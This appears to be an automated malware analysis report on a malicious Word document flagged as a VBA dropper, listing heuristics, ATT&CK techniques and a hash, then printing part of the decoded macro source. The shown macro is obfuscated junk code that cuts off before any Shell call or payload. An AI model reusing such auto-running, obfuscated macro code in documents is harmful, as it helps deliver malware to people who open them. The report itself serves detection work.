Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is commonly used to execute arbitrary commands or download and run additional malware. The 'Document_Open' macro suggests automatic execution upon opening. The ClamAV detection 'Doc.Dropper.Agent-6859377-0' further confirms its malicious nature as a dropper.
Heuristics (5)
- ClamAV: Doc.Dropper.Agent-6859377-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6859377-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28027 bytes |

SHA-256 of macros.bas: 688d4426fb7b307528b6804482974be86f8a61e099182ad6b206650f31dee730
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "qtaRQFv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function jAoIDBTwwiI()
On Error Resume Next
If VivhpY = 13 Then
Set wBpCEz = KXzhI
For BQZpU = 4776 To ZaUWPo
riiPXO = zpBPn * rCDIOR * WmFFGN - zIbia - 25868 - HTfHb * 36861 * OLOJCZ
Next
Else
If XWMIzu Eqv FcZJK Then
VoNXp = Hex(djiXA)
End If
Set wFIarv = nDblP
End If
If TwIJa = 13 Then
Set rHXuBU = kYSRX
For GiMYC = 4776 To zYGhb
rOVsSD = kWWRGo * pVwJC * UtfjG - GwbTla - 91410 - JFjrF * 28871 * mwkNFj
Next
Else
If XdawiE Eqv zipls Then
tIDkqL = Hex(wjlGDn)
End If
Set huuTAq = Zzsov
End If
If FWwWw = 13 Then
Set Zwhqn = ILoKdi
For NKwww = 4776 To kHTcA
nMAXKD = vVXjj * OuhRM * iOjXw - azHOJ - 11328 - jBzjI * 76582 * GUnzqi
Next
Else
If ijUCq Eqv LWaHo Then
QjFAh = Hex(RLALO)
End If
Set YdiJJ = ihUorO
End If
If fDzqb = 13 Then
Set CzLhB = EGGomN
For TkXlbG = 4776 To vwCPP
dfhDtn = LsuFv * wDSqs * DfcdHS - kPaFw - 92725 - WwYYC * 90242 * pcaqSp
Next
Else
If JIcGK Eqv MzACZl Then
CIlmz = Hex(dhziu)
End If
Set zcNDCm = dBaHzz
End If
If LWuGNR = 13 Then
Set dvzWuz = nrUtrJ
For DoWkBk = 4776 To KKwvU
mNrAq = NDzuw * tRlGY * DhoIiY - MhNSl - 7049 - apIaAU * 5234 * vlDtZ
Next
Else
If HTiElB Eqv mTiiSi Then
nzkOrV = Hex(EILFEs)
End If
Set lCFpwq = NfOzC
End If
If GltwVt = 13 Then
Set hPwNYR = SBzjz
For njjAm = 4776 To OIsFE
GlAXMD = ILnjjh * ZwuWr * FrFWEs - OiipK - 82749 - SfUup * 92619 * oOzAwT
Next
Else
If hQNVO Eqv oOjdTU Then
jdjwZs = Hex(Htizh)
End If
Set tQdFWH = wjORT
End If
If XjBfmc <> dtCAck Then
KzmVwM = 63574 * HufmdH + 39684 * 20634 - Esmtpj * ICpCpw / fSbIwL / 17741 + 19264 - wabHzA * YJiMvj / hVRwNw + 44584 / GJFzTC
Else
Vzfuzq = ChrB(NYqIC)
End If
End Function
Private Function YBDKLqb()
On Error Resume Next
If uwjnJ <> lqujkl Then
TjdRw = CDate(65519 * QShHM)
Else
End If
If ChNhwJ <> WIHYtU Then
MUmwHC = CDate(89493 * VkmFOa)
Else
End If
If nbPYa <> Scqdm Then
ZnVLwR = CDate(55579 * oNUIYf)
Else
End If
If zzukHj <> UrUMm Then
SAtsIT = CDate(36277 * jqvUKj)
Else
End If
If JzQwz <> PzYjz Then
mPDwZ = CDate(67255 * pQHSCO)
Else
End If
End Function
Private Function TPYJjazJYGIATw()
On Error Resume Next
If LZYmzU <> GXbwQw Then
Yjbmv = 71187 * FzqRf + 38912 * 78594 - loKZS * FTKjmT / uwnpc / 68428 + 69580 - FUnCa * ahVRA / mmmnq + 61628 / SNQDIR
Else
LCDbC = ChrB(EzfTWW)
End If
If qVDio <> DlBVL Then
nuoCP = 32131 * WlZfw + 40383 * 37589 - wXmVVX * SwKQA / MUsrw / 88193 + 13690 - YsunqE * QqFNU / EOPzqv + 70117 / sszPOJ
Else
jnzbM = ChrB(ZiriiT)
End If
If DKzJK <> VifTj Then
MOTfbP = 83464 * fLqHA + 56685 * 91941 - TMXJwO * KNMQC / PFwupQ / 1450 + 6972 - QOFqn * TrIhOc / TvZdw + 24635 / ROwoY
Else
GuMKM = ChrB(qNvJEI)
End If
If floRm <> RHKAz Then
oRIoRf = 72690 * tXitO + 30494 * 1466 - GTQToX * bblWCk / sDcGv / 75338 + 78266 - CrlTcH * vCWNc / qjfIQ + 58174 / NfIjnp
Else
bRIUNA = ChrB(QYiVv)
End If
If cGjFO <> QHpLpf Then
KCdbY = 52365 * jiPlQR + 54796 * 41331 - Otdow * htYjV / RTYkUC / 26890 + 6911 - YvXVYz * wpzVvz / RMqImV + 69981 / oFvSK
Else
AvOORi = ChrB(zFTZbr)
End If
If FECjR <> GdsIw Then
UjAvX = 53789 * HjCFmI + 88894 * 59740 - XRLcEZ * nwjzBJ / vrcpW / 86466 + 57341 - KCZ
... (truncated)